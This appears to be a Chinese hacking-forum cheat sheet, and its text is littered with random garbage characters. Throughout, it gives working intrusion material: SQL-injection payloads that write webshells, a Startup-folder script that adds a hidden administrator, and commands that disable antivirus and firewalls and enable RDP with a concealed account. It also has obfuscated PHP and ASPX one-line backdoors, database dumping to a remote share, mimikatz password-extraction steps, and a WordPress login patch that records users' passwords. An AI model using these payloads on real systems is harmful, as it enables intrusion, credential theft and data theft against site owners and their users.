SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
6 Z& O- {2 N+ }( L2 W8 |access中导出shell9 l1 F4 W: P" q U$ u, r
) s/ f2 Z2 R; b) E! ^4 `2 `3 W中文版本操作系统中针对mysql添加用户完整代码:
. {0 V! ]+ U; Z, W2 p# i7 o7 Y0 w/ d$ q5 D+ X
use test;" p8 Q7 x5 u7 F; i
create table a (cmd text);
& e: \0 q, P6 ]$ H8 S! b2 S. I+ Binsert into a values ("set wshshell=createobject (""wscript.shell"") " );
0 Q/ [ b, q* }7 n! \; v. linsert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
, J2 Z) g1 T- u+ Z+ t" O4 sinsert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
: g+ K9 I' e1 E8 I6 I1 X4 G& tselect * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";
3 g' Y2 U1 l! }& g% Pdrop table a;; I- j5 k7 f; B3 @
/ A- y3 T' N: W
英文版本:' m/ n" N+ |* D6 A5 e$ k. y4 W8 T* J
& ]1 r% R a, s2 s2 R9 K
use test;
& d, ~* i- f" Q( ^& Tcreate table a (cmd text);
) `* I7 ?1 @! U9 [2 Q G4 S- v* i- A1 `insert into a values ("set wshshell=createobject (""wscript.shell"") " );: s. C; t8 z6 |7 [7 P! ]: j1 c
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
9 y/ A, f7 C+ Xinsert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
) J5 {& P/ o1 ^: U8 A% t- N' kselect * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";
8 S4 [0 r# _' y3 idrop table a;' k. ?* B, c+ t {
. D7 H* K( b) k/ C, Acreate table a (cmd BLOB);
) [9 _" S6 ?% }4 W$ Q4 z) I: |5 Ainsert into a values (CONVERT(木马的16进制代码,CHAR));
/ r' o$ W; r" x/ Rselect * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'* q; m) f+ }4 b2 p9 \
drop table a;. k" n( o& U9 z$ n' q5 F& o# {
' T4 T" t2 n% _9 \
记录一下怎么处理变态诺顿! V) X8 y% M+ z) T
查看诺顿服务的路径
0 f: c* t/ Q! w. Gsc qc ccSetMgr P5 F# K, U2 ?& r
然后设置权限拒绝访问。做绝一点。。
$ R' F# m+ J; b$ Ccacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system! H' a: M; h- j F; E* K+ n
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"2 @+ D p# K% h w0 g( `' O
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators
3 `$ }6 O! C: K7 L8 l; kcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone, ^( x7 ^1 j; a) k J* y, y$ W
+ f8 H( Q6 L2 Q! s% m
然后再重启服务器+ y# k5 k5 x" o1 m/ [ K
iisreset /reboot
. c3 q+ n8 ~' F: h这样就搞定了。。不过完事后。记得恢复权限。。。。
/ H# A3 C7 [1 ^ ~cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F( l' Y# i, ~8 i+ G8 q5 m
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F, \( {; l& Y5 }: X( N7 c. \0 |' f+ Q
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F* Q/ V$ F4 V" K X# \( r. \/ L
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F. a2 u7 s, _7 i: [2 C
SELECT '<%eval(request(chr(35)))%>' into [fuck] in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin
- {! r3 U5 U# `1 o8 R
: r9 [9 a& O% Y5 qEXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')
7 `) v" i. g# X& a" s. H* c7 V9 m+ z) Q! l9 ]) v J' H& R
postgresql注射的一些东西* p& h; |5 p+ m# q$ E
如何获得webshell
# Q$ b# w; k' q/ H3 n: D2 h! ], `http://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null); 2 C4 o7 x+ C; |! ~+ u/ n
http://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$);
. u' T9 j$ |& g6 g0 Zhttp://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;
2 e9 I" v2 g# l( [* R4 ^8 x; y如何读文件
) E5 Z6 `3 Q4 B; yhttp://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);
' s: M7 n+ m) V- Whttp://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;. y9 m0 }6 f0 [$ O3 f
http://127.0.0.1/postgresql.php?id=1;select * from myfile;
: i1 |- j2 E9 o! a
9 d/ h5 V# p0 L) K5 x3 _z执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。8 ~/ x ^! \5 K4 _
当然,这些的postgresql的数据库版本必须大于8.X. }- q5 L; ?3 E' s
创建一个system的函数:6 P+ y& L6 `* N! q
CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT
0 |7 F8 d: m8 a4 i) v; Z& }1 U! O
创建一个输出表:
2 R6 O( }; `( s/ ~ ?" L0 bCREATE TABLE stdout(id serial, system_out text)% u8 b" R" L5 V2 U
, T5 B" N6 b) T+ T执行shell,输出到输出表内:8 W5 Z' M/ Z% H4 U8 [
SELECT system('uname -a > /tmp/test')
" J+ B( U* Y1 I4 F( q1 |3 m7 Z) X7 h' o5 J
copy 输出的内容到表里面;4 x4 S, e1 G. Y8 ^$ T, B0 G: P+ p% z& c
COPY stdout(system_out) FROM '/tmp/test'0 v1 T2 D8 q, s
1 b) V3 O3 k8 s$ w& G' N" a
从输出表内读取执行后的回显,判断是否执行成功/ N$ N1 J" N- `7 A) ?) p
* ^0 t$ I9 @0 g# tSELECT system_out FROM stdout' n- r' F0 W; g! u
下面是测试例子2 L% F9 j* j# z5 z3 n% }2 [
# q3 [# f$ }! R& o/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) --
/ u! ]+ O9 ^' \% E) ]# S) X1 A0 \" t' d& o( t1 z6 d: x6 }! G8 k
/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'9 K0 D3 W9 m) c" C& p
STRICT --9 ?' y8 @5 G6 Q0 J2 X3 N) M
! W8 o+ J4 S7 F9 I- C4 K6 a/store.php?id=1; SELECT system('uname -a > /tmp/test') --/ I# w# w$ b+ g4 R C
2 v; R S# @" i3 B; _1 C6 T
/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --4 g& w# p7 }8 A& s
/ Z: H% c8 ?. X2 E; x0 i/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--
8 Z+ ~( g, {2 Qnet stop sharedaccess stop the default firewall
& z- P* p% `- {netsh firewall show show/config default firewall; U, K4 I- K7 p) p
netsh firewall set notifications disable disable the notify when the program is disabled by the default firewall. b; J% x- f; _9 `9 a3 @ W0 J4 h
netsh firewall add allowedprogram c:\1.exe Svchost add the program which is allowed by default firewall
6 _9 x( h% Y7 x3 [0 w; \! ^修改3389端口方法(修改后不易被扫出)+ m+ d3 N/ y2 A: `+ m/ d& r: t
修改服务器端的端口设置,注册表有2个地方需要修改
& _1 l2 Y* [8 D1 `2 F9 Z* f- R) b- V; x3 p
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]
4 u* ~/ E% N+ z# l1 A9 K- _PortNumber值,默认是3389,修改成所希望的端口,比如60008 ]6 |. [$ I1 j7 m, E% ]/ X$ F# k
1 a8 Q& L) W' t7 w+ d
第二个地方:
+ L2 k1 P4 U' S8 h; T5 @ Q2 C[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp]
+ d7 O8 N) \ X yPortNumber值,默认是3389,修改成所希望的端口,比如6000: b4 k* C) \3 u' E U/ i& ^9 e
, h" w" h* R+ ~$ r: W' B; U* M现在这样就可以了。重启系统就可以了
K. s$ Z+ S t2 b3 B3 c9 L' y+ }4 F; N/ B8 X- s
查看3389远程登录的脚本
! K: S3 X1 {( `4 `3 _) Y保存为一个bat文件
1 i! _4 Q& j% U; R% W2 ~7 H/ K$ _, Pdate /t >>D:\sec\TSlog\ts.log
: v, t( e$ S1 ]/ |3 |time /t >>D:\sec\TSlog\ts.log
+ ^9 W; s- O2 v; g- Unetstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log- Z9 V5 f7 f% X' O
start Explorer* |: l% z" Q* k, B% N4 _, g
4 c$ L* y: @+ x$ T, |6 Emstsc的参数:
+ _: F+ }, D1 u2 u7 Y- d# w- o% n' y5 T# C
远程桌面连接
; q! `9 Z% X' g# G* w
/ B# S# h1 u: {( }, VMSTSC [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]6 T8 U7 r; R% e
[/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?
2 [- X9 e5 a' a( _6 y9 `" K r. I+ J: o# @$ t3 v/ N& y4 `. V
<Connection File> -- 指定连接的 .rdp 文件的名称。
7 b% D% g8 I+ k. E B: u# {" O9 G5 ~/ e% |
/v:<server[:port]> -- 指定要连接到的终端服务器。$ ~4 D5 j( j2 d( q6 q; Z4 ^; p8 t
+ t0 Q! T3 O/ D) J( d. C j5 e/console -- 连接到服务器的控制台会话。# t8 x$ M! d u0 g7 J
+ E' ?' I' m1 i$ E$ k/f -- 以全屏模式启动客户端。 `9 @ e. j1 y1 j& T7 \( K
8 Q+ ~* J8 @% A# @ ^( f0 G1 S+ R3 l
/w:<width> -- 指定远程桌面屏幕的宽度。
J0 I4 }2 A/ _- w8 E$ z: j, [: X. y$ L' {! L$ K- n
/h:<height> -- 指定远程桌面屏幕的高度。
; S5 O1 w* G* B( n- U" z8 X, r |+ s# Y5 f2 z1 r1 Q# I
/edit -- 打开指定的 .rdp 文件来编辑。$ s5 N Z8 b5 Q$ D
' J8 [* \9 K* {; F) v
/migrate -- 将客户端连接管理器创建的旧版1 _9 `; W# N& |3 Y! a5 q& ~5 z
连接文件迁移到新的 .rdp 连接文件。: F5 Q; ?7 I$ ]
/ b' Y9 O4 F- ` t) e5 f+ z, [0 e1 G: I
其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就! c) ~- ~" y) B; F/ P
mstsc /console /v:124.42.126.xxx 突破终端访问限制数量# C0 J4 J+ U( m9 G8 B: f& f
- ~) n$ L3 v& o! w命令行下开启3389) E$ O- J1 R% |- t
net user asp.net aspnet /add! E' S w5 c7 E; [3 J" O
net localgroup Administrators asp.net /add \( [% }% \) O/ N2 W0 G$ \0 V/ R
net localgroup "Remote Desktop Users" asp.net /add& z& V: `; i6 l8 `% E
attrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D
! B' \9 a2 b5 z" g# Z( G- A. Iecho Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0
. I& t* b0 B# @echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1
- G4 n9 \% D, v3 m6 H4 necho Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f$ k% c h/ ]4 ^0 x
sc config rasman start= auto
' b0 p* v9 ^( {' s8 {- C* e0 I! msc config remoteaccess start= auto
( s& e: d( s1 L2 I; E" }net start rasman( E7 ^/ d1 Z) L" x9 F# `
net start remoteaccess+ n3 f. @$ c; g% D/ y
Media4 w4 a# p2 A e" h: w" {
<form id="frmUpload" enctype="multipart/form-data"
! i, A" s. a2 [4 M5 f: n4 }8 iaction="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>+ W" p+ N& d! ~ H
<input type="file" name="NewFile" size="50"><br>
q$ ^1 l2 g) C! W) g<input id="btnUpload" type="submit" value="Upload">- z* b; w$ W0 z; x. |1 W% x
</form>
9 ^4 b& M, f% i* d& \# | d4 U' y# S
control userpasswords2 查看用户的密码
# K$ z# t- J+ b6 A9 Z# vaccess数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径9 g. D& N9 w9 `- t4 \
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a$ h/ b/ y" U. h) G0 S8 [
, v( ]' C: A6 K% l& a" y3 @" x141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:
, X! }$ C+ M( f9 j! X+ M6 J测试1:
$ a- H" U/ W7 O: Q7 ^4 WSELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t11 n$ J/ t3 P: @8 K" Y. |
! Q1 o- p, k& r# O# g7 S. t; C8 f测试2:
1 G( j! x, N$ D: G6 R# p$ {$ \, z' @# l! g5 q4 }/ ~7 p" @
create table dirs(paths varchar(100),paths1 varchar(100), id int)( z" i0 X2 W5 W3 }" i8 ~3 e A
1 \# P; e0 z% p) s* g. V& b6 cdelete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
% N, }: ?) K0 C
( h8 w/ \7 A) n4 ~7 Z2 T9 ~SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1* [5 B4 h |5 Q' h: E+ R" y
关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令1 R7 z& B+ u2 ]
可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;
" A A; D$ D* k; b4 ^5 L3 I, Xnet stop mcafeeframework8 `& w* c1 w5 K) B. e5 E% q8 K, ?/ \7 u1 L
net stop mcshield
; h0 m- s) m1 A9 |/ Mnet stop mcafeeengineservice
, O$ ~+ Q) _9 ~) x# \, ]( ynet stop mctaskmanager) i, j& f/ S2 u6 s; v! S1 y3 O& S3 P
http://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D
% s, C; Z, H0 X3 }
) F/ h: t: V1 O% ^) A VNCDump.zip (4.76 KB, 下载次数: 1) * Q2 _ q, }& G: [$ f# P
密码在线破解http://tools88.com/safe/vnc.php
& D! I4 q2 I* T2 PVNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取
) r& ~: j7 O2 ~$ v* r9 @
8 m" ?6 I8 G3 Texec master..xp_cmdshell 'net user'
3 g2 A& r3 y; B. o) ]' wmssql执行命令。
% W: ~% q! {4 K) O; t( b' l# U获取mssql的密码hash查询
( g# M. o) P( ]2 Bselect name,password from master.dbo.sysxlogins
% J( v: S8 R: ?( ^
. p i' x1 J! t- m1 z6 r1 |backup log dbName with NO_LOG; a# h! |+ r9 v9 U$ _
backup log dbName with TRUNCATE_ONLY;
" U% [3 J4 @6 RDBCC SHRINKDATABASE(dbName);0 M8 I4 I% W9 c
mssql数据库压缩1 w( N6 L! G) a8 @0 l
6 [7 p9 L( i& D* Q+ `1 @
Rar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK
- i% e9 A4 D5 _( u/ }( M将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。" W+ E4 Z; Y. @0 o9 `3 b1 _8 m
( h g) B j( X x+ Pbackup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'3 |+ \( g: `' E/ Y: [
备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak
7 b# H( ^* F$ Z/ h/ _
- B: M; R' |) C2 \Discuz!nt35渗透要点:/ k( G: L3 Z* Z r f
(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default
% ] f l/ w( q. i" z7 G6 S7 o(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
, x$ J2 q, ?$ C# D! t8 c(3)保存。' p2 T- U9 g/ B9 |9 G0 }5 k
(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass
4 y7 U: |, | w E1 i/ \d:\rar.exe a -r d:\1.rar d:\website\
5 Y1 M8 C! L" n% g- _, ~6 K+ ?递归压缩website7 w. K3 h# z6 Q1 M4 g$ c5 E f2 \- i
注意rar.exe的路径* X0 Z8 [9 O3 ~- ]+ }7 S
- x) u) v1 f7 w* e+ c# ?- c
<?php M: r% K8 V+ A
0 K N$ q: _, z: T3 U$telok = "0${@eval($_POST[xxoo])}";
: k/ ~; ]' q2 N) L: E. H0 S. l, K
$username = "123456";
/ L ~% y& e8 x6 n. @' Q1 r, x& R" B9 d9 ~# W! |- u" q
$userpwd = "123456";/ r( t8 k; {/ P
" K+ u6 p7 L# @& X$ z9 D$telhao = "123456";
6 \2 T* F3 D/ I0 p$ t! l+ L# e0 T& M5 N, X2 k
$telinfo = "123456";
2 t w$ J- Y$ R* x% C/ G3 [ [4 s. r: S$ S/ {
?>
: @: M7 C. K7 G$ g0 sphp一句话未过滤插入一句话木马0 t" T! U/ ~; F
4 \- u3 u+ K5 n+ Z. |. w
站库分离脱裤技巧
, s8 ]" d4 ^( |+ ^3 Qexec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'
9 [3 V1 V* T2 f6 A$ ^, Oexec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'
# h" x& _- _8 i' E* q+ Z条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。) s8 n( N# ~+ O) `4 N
这儿利用的是马儿的专家模式(自己写代码)。' S9 T2 Q1 e2 D4 A* ^6 }
ini_set('display_errors', 1);
0 M; Y+ \; ^9 s I" ~set_time_limit(0);
I$ E$ M1 F8 S. gerror_reporting(E_ALL);
( F! }* T7 Q- C; e0 S3 [$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());
$ `5 _ r3 `; E+ C3 x3 bmysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());6 h9 N$ Z$ t4 k1 I7 ? ` Y
$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());9 _2 r5 \. m) r0 Q4 H4 B) Z
$i = 0;
) l# y! d0 p% M6 y: ^7 ` D4 B ]# D$tmp = '';1 ~% ~% Z# n) `5 s. ^' Z1 ?
while ($row = mysql_fetch_array($result, MYSQL_NUM)) {
U6 K2 J/ G) p0 I' j7 K $i = $i+1;6 @2 W3 a# z% v, C, {: @
$tmp .= implode("::", $row)."\n";1 H/ l& q2 @: e% v C
if(!($i%500)){//500条写入一个文件9 r, e- {8 N* {+ [6 ]
$filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';
|8 G. \% k# l3 R' @' l2 f file_put_contents($filename,$tmp);" E$ f( N4 Z* W) [: n# U
$tmp = '';
7 S3 J. d- h. \" L6 o- F2 O }
; `# s* L3 \" \! Q) B}( X# J9 p" n; ^; e2 a( a; u
mysql_free_result($result);
7 ^" v h6 u3 P1 i/ o/ p8 E: V1 C+ d H3 v& |8 n
A. A1 k4 }/ g4 S. ~5 c3 g+ x- M% N% B2 \5 e' ]0 d5 Y
//down完后delete, I0 i( m8 f% W' T; D6 z* a; b
! ]! G: m/ z6 s T {( P$ \
7 y. T k, R% c5 wini_set('display_errors', 1);- ~9 f" ^; d3 M0 d! N7 `
error_reporting(E_ALL);& x5 W& U3 R+ I& O) K: F! y: ]
$i = 0;
$ Q4 O% O: S8 y$ T; ^- A! F0 A* l w& Pwhile($i<32) {0 Y0 e1 T3 A, i! W/ m
$i = $i+1;
& W6 v* L* p+ f% k' H: { $filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';
|* V) s( Q& x2 O4 E- z unlink($filename);2 M7 I8 R' e% a( o/ l
} 0 ?& ^# H& |+ ^' c: t; B! H
httprint 收集操作系统指纹% K0 D! _) f2 [ F: k+ u R; s
扫描192.168.1.100的所有端口
S* o- w# Y. K4 onmap –PN –sT –sV –p0-65535 192.168.1.1003 @# H' L- T+ J, q) i) {
host -t ns www.owasp.org 识别的名称服务器,获取dns信息7 ^2 e, ` j& u% U- R! o7 h% C5 g( b' V
host -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输; ]( V q/ J: F- N
Netcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host: A0 J. @! a" _' o- ?' e
( U+ N( n( i: Q1 [/ Y
Domain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)
/ k& h& Y3 W8 O3 O0 S1 T
) z) u# y$ H8 v0 M- Y2 j6 u MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)
1 l" P, O- b* B1 x
; v( ?+ O/ H% a2 Q Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x
& H: p/ ^; v5 `/ f& K/ e
c# r0 r- m" h" k DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)
6 N, T# Y7 \3 n& L7 C* Q' b% o( k" E6 {3 x/ J1 x7 s
http://net-square.com/msnpawn/index.shtml (要求安装)
% ?" F2 B# C1 d. [6 l6 a" R9 H1 b: F4 V1 o
tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)
* _1 B1 N/ `% k! B3 F+ x8 m6 E! r2 X- e; |$ ^
SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)0 A+ k# Y3 x# D3 V$ H) }
set names gb2312
2 L, @4 u6 U4 z- S导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。
$ ?& T0 v2 X* A# W: \( ~+ P5 x! k ~9 M( [2 a7 i1 n& b) `# d. G
mysql 密码修改
" N# S0 }* h. e. r! ^0 E: IUPDATE mysql.user SET password=PASSWORD("newpass") whereuser="mysqladmin ” ! J* k# z4 i) G) v k% a
update user set password=PASSWORD('antian365.com') where user='root';- [5 M& D+ Z2 \7 t; k5 s- _1 d! @
flush privileges;+ @ R" g1 U0 D2 C) x! [* f
高级的PHP一句话木马后门
$ Y4 C0 E& r# T2 p/ M3 \0 X1 O, o3 y* B9 Q! R8 L$ x& s
入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀
. W0 m" I" X0 b$ h2 q+ U+ o) W0 I; l7 `% x
1、
* N. d; ?% ^+ k/ X& i9 ? R
2 A f' e# W: I/ H# x$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";' E$ K. q5 r9 q, X
) S. o5 i4 M- i9 k$hh("/[discuz]/e",$_POST['h'],"Access");
% N7 H Q# e! f/ K6 _/ {6 H( m, Y- v4 x+ K
//菜刀一句话
7 a2 [' s& u2 {6 d4 f8 T5 k/ Q# p
2、
( n1 z" X& m2 R5 }2 u. o7 r% N: w6 |& J1 O
$filename=$_GET['xbid'];
: K8 X6 Q; o6 T% B' L
2 \4 K5 [+ ` J" Cinclude ($filename);: U+ ?3 i( Z. H
9 A6 ?- W1 [) K6 w//危险的include函数,直接编译任何文件为php格式运行
! q: d4 l* R0 s. d7 A* @3 |& K7 [# g5 f" \( _$ ~& H" Z
3、
( W$ K9 l: k4 P1 z' ~1 i* ]2 Z- L5 W3 Y
1 Q1 O2 G# [% Y$ V" p$ i! T5 B$reg="c"."o"."p"."y";
' [' j' F' V4 j6 w2 v5 c+ p) C- q/ Q) v+ t D/ L
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);
0 x; M- \5 Y! r. D9 R) O( i" t& ?8 H$ r- O" \
//重命名任何文件
* @9 u5 N& U/ u/ J k" ?
# Q3 h i) H3 F! G/ |4、) F8 B, H( G. }0 j( ~$ @$ ]
* {& a& g% y: z! `$ k8 k3 {$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";% o7 Q5 Q( ~: Y6 K1 k% k- |& h
2 i' u6 r* ~- r2 ^+ x" o) f$gzid("/[discuz]/e",$_POST['h'],"Access");& s1 O8 C# a0 x
( {7 m! X2 B0 O: e
//菜刀一句话% C) b& R3 m: }/ h) M1 S
; ]8 d. x( V% O6 J5、include ($uid);7 l% G3 ?% O6 A: q6 I" p- X
T8 O# M) |8 [' Q% f
//危险的include函数,直接编译任何文件为php格式运行,POST 4 x* K" K& O0 J2 q2 z/ a. u! O0 v
n8 ]9 b( x8 ]1 Z. O
, `# x. Y. M$ {0 s( t//gif插一句话
" z4 b5 B/ {* K+ D$ O m, t0 n+ \: ?4 m! r
6、典型一句话2 `9 v$ _) q/ P1 Q5 e: O
2 J& {4 U8 J, [% M5 i程序后门代码
$ E- m1 h- G: `! L+ ~; Y% ^<?php eval_r($_POST[sb])?>
/ \$ C' S, K' n) F2 w! \& v+ a程序代码; i; _8 x/ E" N# z
<?php @eval_r($_POST[sb])?>
) r" }4 Y5 h/ n a( b" V# e/ t6 W//容错代码2 J% X3 f; c' e' K$ n. c
程序代码' d# P3 s* Z1 d7 k" I& Z8 N: I: q
<?php assert($_POST[sb]);?>' F5 x7 V. R5 U2 \, ~5 x
//使用lanker一句话客户端的专家模式执行相关的php语句" G! d5 r3 Z, Z3 ~( v$ `# v
程序代码
$ H' W3 x8 X! d+ f8 m<?$_POST['sa']($_POST['sb']);?>
5 y- N) r8 j: E- Z" U程序代码
+ H/ \& u+ E- a7 @; j<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>
8 T; u V* y' a$ u' R' L% M/ ~程序代码
9 }! h9 ?6 [( o. O( w<?php' q# W3 b+ M/ D' m1 M
@preg_replace("/[email]/e",$_POST['h'],"error");8 X) a! y/ a' ~& x4 C
?>- i+ g/ q/ f( R4 u$ z
//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入
5 \% ~) h% S; x9 p- Y$ Z程序代码/ A9 R4 Z. @$ w0 j0 v' j% F0 L9 C
<O>h=@eval_r($_POST[c]);</O>
, _$ q- P) i, T/ L程序代码& c n4 T& U1 w
<script language="php">@eval_r($_POST[sb])</script>& q8 N8 G, m4 [( O6 M M- y) T
//绕过<?限制的一句话
( y+ c4 }3 ]0 F7 A4 t1 j& L9 M3 E
http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip+ E/ A% Z; g7 n/ R" t$ Y, I
详细用法:
1 C: x+ q+ y k$ l; h }1、到tools目录。psexec \\127.0.0.1 cmd
$ E6 d! h3 q i2 C. |2、执行mimikatz
5 V/ h9 Y; j2 Y$ b, j3、执行 privilege::debug" N# \' d5 `# u
4、执行 inject::process lsass.exe sekurlsa.dll
. D3 L2 V5 x0 F: Z. B/ g& ~$ z5、执行@getLogonPasswords
6 ~) E5 v# N7 f1 w( K4 `& \) ^6、widget就是密码
A: J- f! n" c- J7、exit退出,不要直接关闭否则系统会崩溃。
/ R7 `6 e: t+ Q* h y- T
4 L8 l5 b$ a% ?' N0 A" mhttp://www.monyer.com/demo/monyerjs/ js解码网站比较全面6 q. N+ R/ g+ x0 k/ o3 |: `# x
0 q/ L" M6 z1 V2 r1 w4 b9 [自动查找系统高危补丁
3 }) S9 C/ t" W& dsysteminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt3 o$ G! {- ~* s3 L# d
5 h) P( @9 Y+ S& U
突破安全狗的一句话aspx后门6 }" ~8 x' W b: D( j
<%@ Page Language="C#" ValidateRequest="false" %>( Z8 m$ T1 h$ N/ E
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>
3 ~# [: P% ?! ~- \! o4 lwebshell下记录WordPress登陆密码
5 A* S: L- k+ o7 `( H8 _) T; Iwebshell下记录Wordpress登陆密码方便进一步社工
! d" r3 {: `3 z/ K7 M在文件wp-login.php中539行处添加:0 \# q6 C; T( w) n. C
// log password
0 u2 }5 u, ]' @$ e5 k$log_user=$_POST['log'];5 u1 s1 @- @1 x' B
$log_pwd=$_POST['pwd'];
" T; g( ] z: X$log_ip=$_SERVER["REMOTE_ADDR"];
' L4 \1 \$ [7 D& v% l6 R' i$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;
' T. {& s0 O4 B$ |9 [$txt=$txt.”\r\n”;" m& [" g6 X% f& k+ C
if($log_user&&$log_pwd&&$log_ip){
' @/ @+ g* }5 Z% Q# o6 _@fwrite(fopen(‘pwd.txt’,”a+”),$txt);
